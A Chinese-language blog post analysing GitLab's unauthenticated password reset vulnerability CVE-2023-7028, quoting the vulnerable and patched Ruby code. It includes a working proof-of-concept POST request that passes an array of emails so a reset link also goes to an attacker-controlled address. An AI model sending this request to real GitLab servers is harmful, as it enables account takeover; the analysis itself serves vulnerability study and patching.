浅析Gitlab未授权密码重置(CVE-2023-7028) {#浅析Gitlab未授权密码重置-CVE-2023-7028}

补丁在https://gitlab.com/rluna-gitlab/gitlab-ce/-/commit/24d1060c0ae7d0ba432271da98f4fa20ab6fd671，由于问题非常简单，这里就不多说了

可以看到在原来的逻辑当中app/models/concerns/recoverable_by_any_email.rb

|------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | module RecoverableByAnyEmail extend ActiveSupport::Concern class_methods do def send_reset_password_instructions(attributes = {}) email = attributes.delete(:email) super unless email recoverable = by_email_with_errors(email) recoverable.send_reset_password_instructions(to: email) if recoverable&.persisted? recoverable end private def by_email_with_errors(email) record = find_by_any_email(email, confirmed: true) || new record.errors.add(:email, :invalid) unless record.persisted? record end end def send_reset_password_instructions(opts = {}) token = set_reset_password_token send_reset_password_instructions_notification(token, opts) token end private def send_reset_password_instructions_notification(token, opts = {}) send_devise_notification(:reset_password_instructions, token, opts) end end |

首先获取参数email,通过by_email_with_errors方法查找用户，如果未找到用户也会向记录中添加错误，接下来我们具体看看find_by_any_email方法，如果email参数存在则继续向下执行by_any_email方法

|-------------------|-------------------------------------------------------------------------------------------------------------------------------| | 1 2 3 4 5 | def find_by_any_email(email, confirmed: false) return unless email by_any_email(email, confirmed: confirmed).take end |

在这里我们也不必要梳理具体的逻辑，从by_user_email的参数我们可以看出，它通过iwhere去查找对应的记录，同时我们可以发现从参数类型可以看到它是支持数组的！如果记录存在就会触发密码重置邮件的发送。

|------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | def by_any_email(emails, confirmed: false) from_users = by_user_email(emails) from_users = from_users.confirmed if confirmed from_emails = by_emails(emails).merge(Email.confirmed) from_emails = from_emails.confirmed if confirmed items = [from_users, from_emails] user_ids = Gitlab::PrivateCommitEmail.user_ids_for_emails(Array(emails).map(&:downcase)) items << where(id: user_ids) if user_ids.present? from_union(items) end xxx省略xxx scope :by_user_email, -> (emails) { iwhere(email: Array(emails)) } scope :by_emails, -> (emails) { joins(:emails).where(emails: { email: Array(emails).map(&:downcase) }) } scope :for_todos, -> (todos) { where(id: todos.select(:user_id).distinct) } scope :with_emails, -> { preload(:emails) } scope :with_dashboard, -> (dashboard) { where(dashboard: dashboard) } scope :with_public_profile, -> { where(private_profile: false) } scope :with_expiring_and_not_notified_personal_access_tokens, ->(at) do where('EXISTS (?)', ::PersonalAccessToken .where('personal_access_tokens.user_id = users.id') .without_impersonation .expiring_and_not_notified(at).select(1) ) |

因此我们不难构造其poc

|-------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | 1 2 3 4 5 | POST /users/password HTTP/1.1 Host: 118.195.225.92:8090 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 authenticity_token=GNymVmxzUZVZrVqQS5cCtrlDwdbdGpmh4v4ojIqKc1r_yUalsQ7K5QclCQihuK88E2lJvcMGcPr5E4uJH1qtGw&user[email][]=123@163.com&user[email][]=47.109.68.247:1234/?a=@qq.com |

简单看一下修复后的代码，虽然代码变动还是蛮大的，但是我们不难发现有一点，在查询时调用了attributes[:email].to_s，这个to_s其实就会将其转换为字符串，也避免了数组的问题，后面还有些其他的改动当然不是很重要，有兴趣自己看看

|---------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | module RecoverableByAnyEmail extend ActiveSupport::Concern class_methods do def send_reset_password_instructions(attributes = {}) return super unless attributes[:email] email = Email.confirmed.find_by(email: attributes[:email].to_s) return super unless email recoverable = email.user recoverable.send_reset_password_instructions(to: email.email) recoverable end end def send_reset_password_instructions(opts = {}) token = set_reset_password_token send_reset_password_instructions_notification(token, opts) token end protected def send_reset_password_instructions_notification(token, opts = {}) send_devise_notification(:reset_password_instructions, token, opts) end end |